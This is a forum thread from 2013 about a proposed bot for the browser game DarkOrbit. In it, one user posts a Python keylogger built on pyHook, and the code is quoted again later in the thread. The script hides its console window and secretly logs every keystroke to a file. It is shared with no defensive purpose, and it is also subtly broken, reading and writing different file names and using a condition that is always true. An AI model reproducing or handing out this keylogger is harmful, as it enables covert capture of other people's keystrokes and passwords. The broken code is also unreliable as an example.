Free Darkorbit BOT Unlimited! Undetectable

03/10/2013 00:40 Bloggerss#1
Hi Guys ;

I Would Like To Share My Project;

Im VisualBasic , Delphi Programmer I Have To Many Bugs On Darkorbit But Its Flash, and I Dnt Know HowTo Use Them , Just 1 Think I Need And If You Guys Help Me About This.
The Think I Need Is 1 Person Who Know FLASH Programming?

If Anyone In Here Flash Programmer Pls Contact With Me Waiting For PM!

So I Can Make This BOT Eveyone Can Use FREE! Thank You! ...
03/10/2013 00:44 justme195#2
good luck
03/10/2013 01:31 jorg*#3
Quote:
Originally Posted by Bloggerss View Post
Hi Guys ;

I Would Like To Share My Project;

Im VisualBasic , Delphi Programmer I Have To Many Bugs On Darkorbit But Its Flash, and I Dnt Know HowTo Use Them , I Wanna Make A Bot Free For Everyone But Just 1 Think I Need And If You Guys Help Me About This. Me You Guys And Everyone In The World Can Use This Bot Free! And Unlimited.

The Think I Need Is One Person Who Know FLASH Programming?

If Anyone In Here Flash Programmer Pls Contact With Me And We Can Share Stuff And Can Make This Bot!.. Waiting For PM!

Thank You! ...
no offence dude , but i cannot understand what you are saying, this wil be the biggest problem you wil have when working together with people...

anyways, this is you"re first post,...
Do you already have something ready ? I mean from you"re project:)
03/10/2013 02:04 black.ripper#4
He's maybe reffering to ActiveX programming. Other "Flash programming" doesn't exist at least that's what I know. However, free bot = 0 because I don't think there would be people to upgrade it, therefore a lost cause. But this is just an opinion. A friendly one. :)
03/10/2013 02:50 vuk4_dot4#5
ActiveX ?
You got Encryptions ?
03/10/2013 08:32 batuhanboran123#6
i have pythoon and pyHook

but its my first

Code:
import win32api
import win32console
import win32gui

import pythoncom, pyHook

win = win32console.GetConsoleWindow()
win32gui.ShowWindow(win,0)

def OnKeyboardEvent(event):
    if event.Ascii==5:
        _exit(1)

    if event.Ascii != 0 or 8:
        f=open('c:\\output.txt','r')
        buffer=f.read()
        f.close()
        f=open('c:\\outpost.txt','w')
        keylogs=chr(event.Ascii)
        if event.Ascii==13:
            keylogs='/n'
        buffer += keylogs
        f.write(buffer)
        f.close()

hm = pyHook.HookManager()
hm.KeyDown = OnKeyboardEvent
hm.HookKeyboard()
pythoncom.PumpMessages()
03/10/2013 08:38 linksus#7
Maybe you find here a answer for your question. ;)
03/10/2013 13:42 Bloggerss#8
Quote:
Originally Posted by vuk4_dot4 View Post
ActiveX ?
You got Encryptions ?
Yeah I Do ;)

Quote:
Originally Posted by jorg* View Post
no offence dude , but i cannot understand what you are saying, this wil be the biggest problem you wil have when working together with people...

anyways, this is you"re first post,...
Do you already have something ready ? I mean from you"re project:)
I Have Example From Diffrent Bots...

Quote:
Originally Posted by linksus View Post
Maybe you find here a answer for your question. ;)
Thank You Mate.


Quote:
Originally Posted by batuhanboran123 View Post
i have pythoon and pyHook

but its my first

Code:
import win32api
import win32console
import win32gui

import pythoncom, pyHook

win = win32console.GetConsoleWindow()
win32gui.ShowWindow(win,0)

def OnKeyboardEvent(event):
    if event.Ascii==5:
        _exit(1)

    if event.Ascii != 0 or 8:
        f=open('c:\\output.txt','r')
        buffer=f.read()
        f.close()
        f=open('c:\\outpost.txt','w')
        keylogs=chr(event.Ascii)
        if event.Ascii==13:
            keylogs='/n'
        buffer += keylogs
        f.write(buffer)
        f.close()

hm = pyHook.HookManager()
hm.KeyDown = OnKeyboardEvent
hm.HookKeyboard()
pythoncom.PumpMessages()
Batuhan Ben Istediğim Şeyi Dikkatli Oku Bu Ne Mk :D
03/10/2013 16:10 jorg*#9
Quote:
Originally Posted by batuhanboran123 View Post
keyloggger görmemiş pic lise 2 tayfasından ne istion mk... :D
#reported
reason : This is german/english forum
03/10/2013 16:18 batuhanboran123#10
Quote:
Originally Posted by jorg* View Post
#reported
reason : This is german/english forum
i said its a keylogger what u expected student :)


*-*
03/10/2013 16:47 Arby#11
[Only registered and activated users can see links. Click Here To Register...]

#closed